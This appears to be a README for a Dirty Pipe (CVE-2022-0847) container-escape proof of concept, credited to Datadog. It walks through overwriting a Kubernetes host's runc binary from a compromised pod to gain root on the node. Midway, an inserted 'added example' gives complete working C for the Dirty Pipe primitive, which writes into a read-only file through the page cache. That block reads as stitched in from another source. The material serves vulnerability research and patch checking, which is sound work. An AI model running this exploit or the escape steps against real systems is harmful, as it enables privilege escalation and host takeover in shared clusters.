## https://sploitus.com/exploit?id=1BD47E86-3B10-5D96-B1C1-658AFD757407
# Dirty Pipe Container Escape

**Write-up: [Using the Dirty Pipe Vulnerability to Break Out from Containers](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/)**

This repository contains a proof-of-concept exploit that leverages the Dirty Pipe vulnerability (CVE-2022-0847) to break out from an unprivileged container.

Tested on kernel 5.10.0-0 with runc 1.0.2 on Kubernetes 1.22.7, but it should work on any vulnerable kernel (Dirty Pipe affects Linux 5.8 and later; it is fixed in 5.16.11, 5.15.25 and 5.10.102).

See also: [The Dirty Pipe vulnerability: Overview, detection, and remediation](https://www.datadoghq.com/blog/dirty-pipe-vulnerability-overview-and-remediation/).

## Demo

<p align="center">
  <a href="https://github.com/DataDog/dirtypipe-container-breakout-poc/raw/main/demo.gif">
    <img src="./demo.gif" alt="Terminal recording" />
  </a>
</p>


## Usage

1. Deploy the pod definition `pod.yaml` to a Kubernetes cluster. This simulates a pod that has been compromised by an attacker. Note that the pod is unprivileged.

```
$ kubectl apply -f pod.yaml
pod/compromised-pod created
```

2. Execute `/bin/sh` in the compromised pod. Because the container's `/bin/sh` has been replaced with a `#!/proc/self/exe` script, the kernel resolves the interpreter to runc itself when runc launches the shell; the exploit uses this to reach the host's runc binary and overwrites it through Dirty Pipe, leading to a full host compromise.

```
$ kubectl exec -it compromised-pod -- sh
```

The payload used in the current exploit simply runs `id` and `hostname` on the host node and writes the result to `/tmp/hacked`:

```
$ cat /tmp/hacked
uid=0(root) gid=0(root) groups=0(root)
pool-stbjbwsjv-cn15e
```

## Notes

This proof of concept requires the malicious script to run as root inside the container, in order to overwrite `/bin/sh` (or any other binary that has a high chance of being executed through `kubectl exec`) with the necessary contents (`#!/proc/self/exe`). Note that Dirty Pipe itself cannot be used to perform that overwrite: a Dirty Pipe write lands inside a page-cache page that was spliced into the pipe, so it can never start at the first byte of a page (and cannot cross a page boundary), and therefore can never touch the first byte of the target file. That byte would remain 0x7f, the first magic byte of an ELF binary, and the kernel would never treat the file as a `#!` script.
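The following is an added example, not the repository's exploit code, that demonstrates the constraint just described. `dp_check_offset` encodes the rules a Dirty Pipe write has to obey (offset not page-aligned, no page-boundary crossing, so byte 0 of the file is unreachable), and `dp_overwrite` performs the classic primitive against a file opened read-only: fill and drain a pipe so its buffers keep the `PIPE_BUF_FLAG_CAN_MERGE` flag, splice one byte from just before the target offset, then write the payload into the pipe. It reports whether the bytes show up when the file is read back, which is how you tell a vulnerable kernel from a patched one. The function names, the temporary file and its contents are constructed for this example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example of the Dirty Pipe (CVE-2022-0847) write primitive; not
 * the repository's code. Writes merge into the page-cache page that a
 * one-byte splice pulled into the pipe, so they can neither start at
 * byte 0 of a page nor cross into the next page. */

/* Returns 0 if (offset, len) is a reachable Dirty Pipe write, -1 otherwise. */
int dp_check_offset(off_t offset, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    if (offset <= 0 || len == 0)
        return -1;                      /* byte 0 of the file is out of reach */
    size_t in_page = (size_t)(offset % page);
    if (in_page == 0)
        return -1;                      /* would start a fresh page: nothing to merge into */
    if (in_page + len > (size_t)page)
        return -1;                      /* would cross a page boundary */
    return 0;
}

/* Fill and drain the pipe: every pipe_buffer is left free but still
 * carries PIPE_BUF_FLAG_CAN_MERGE, which a vulnerable splice() never clears. */
static int dp_prepare_pipe(int p[2])
{
    static char buf[4096];
    if (pipe(p) != 0)
        return -1;
    int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_size < 0)
        return -1;
    for (int r = pipe_size; r > 0;) {
        int n = r > (int)sizeof buf ? (int)sizeof buf : r;
        if (write(p[1], buf, n) != n)
            return -1;
        r -= n;
    }
    for (int r = pipe_size; r > 0;) {
        int n = r > (int)sizeof buf ? (int)sizeof buf : r;
        if (read(p[0], buf, n) != n)
            return -1;
        r -= n;
    }
    return 0;
}

/* Write data into the page cache of a file opened O_RDONLY.
 * Returns 1 if the file reads back with the new bytes (kernel vulnerable),
 * 0 if it is unchanged (kernel patched), -1 on error or illegal offset. */
int dp_overwrite(const char *path, off_t offset, const void *data, size_t len)
{
    if (dp_check_offset(offset, len) != 0)
        return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || offset + (off_t)len > st.st_size) {
        close(fd);                      /* the primitive patches bytes, it cannot extend a file */
        return -1;
    }
    int p[2];
    if (dp_prepare_pipe(p) != 0) {
        close(fd);
        return -1;
    }
    off_t splice_off = offset - 1;      /* pull the page holding offset-1 into the pipe */
    int rc = -1;
    if (splice(fd, &splice_off, p[1], NULL, 1, 0) == 1 &&
        write(p[1], data, len) == (ssize_t)len) {
        char *check = malloc(len);      /* read back through the page cache */
        if (check && pread(fd, check, len, offset) == (ssize_t)len)
            rc = memcmp(check, data, len) == 0 ? 1 : 0;
        free(check);
    }
    close(p[0]);
    close(p[1]);
    close(fd);
    return rc;
}

/* Stand-alone demo against a constructed temp file, not against runc. */
int main(void)
{
    char path[] = "/tmp/dirtypipe-demo-XXXXXX";   /* constructed target */
    int fd = mkstemp(path);
    if (fd < 0)
        return 1;
    const char content[] = "\x7f" "ELF....original bytes....";
    if (write(fd, content, sizeof content - 1) < 0)
        return 1;
    close(fd);
    int r = dp_overwrite(path, 4, "#!/p", 4);       /* offset 4: legal */
    printf("%s: %s\n", path,
           r == 1 ? "kernel vulnerable, bytes changed" :
           r == 0 ? "kernel patched, file unchanged" : "error");
    printf("write at offset 0 accepted? %s\n",
           dp_check_offset(0, 4) == 0 ? "yes" : "no");
    unlink(path);
    return r < 0;
}
```

Run it as an unprivileged user: on a vulnerable kernel the read-only temp file changes, on a patched one it does not, and in both cases the offset-0 write is rejected before any syscall is made, which is exactly why `#!` cannot be planted with Dirty Pipe alone.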

Breaking out from a container as an unprivileged user is left as an exercise to the reader, who is highly encouraged to contribute back to this repository. :-)

## Credits

- Dirty Pipe original PoC: Max Kellermann (https://dirtypipe.cm4all.com/)
- Exploitation of CVE-2019-5736 through overwrite of runc: Yuval Avrahami (https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)